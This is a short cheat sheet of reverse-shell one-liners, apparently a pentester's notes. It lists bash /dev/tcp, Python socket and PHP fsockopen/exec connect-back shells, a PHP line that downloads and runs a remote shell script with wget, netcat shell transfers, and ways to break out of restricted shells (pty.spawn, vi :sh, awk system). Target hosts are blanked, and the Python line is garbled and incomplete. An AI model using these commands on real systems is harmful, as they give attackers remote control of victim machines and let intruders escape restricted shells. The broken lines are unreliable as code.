Reverse Shell


connect back at 103 with bash

bash -i >& /dev/tcp/ 0>&1

python reverse shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[“/bin/sh”,”-i”]);’


php with bash

<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/ 0>&1′”); ?>


php reverse shell.txt, to host

<?php $sock=fsockopen(“”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);?>

to download and execute shell

<?php system(“wget -O /tmp/shell.php; php /tmp/shell.php”); ?>


transfer shell with nc

nc -lvp 1234 < php_reverse_shell.php
cmd=nc 123 > reverse-shell.php
-w 1
-q 1

Is it possible to break out of “jail” shell

python -c “import pty; pty.spawn(‘/bin/bash’);”


echo os.system(‘/bin/bash’)

/bin/sh -i

vi -> :sh or :!UNIX_command

awk ‘BEGIN{system(“/bin/bash”)}’


<?php system(“wget -O /tmp/shell.php; php /tmp/shell.php”); ?>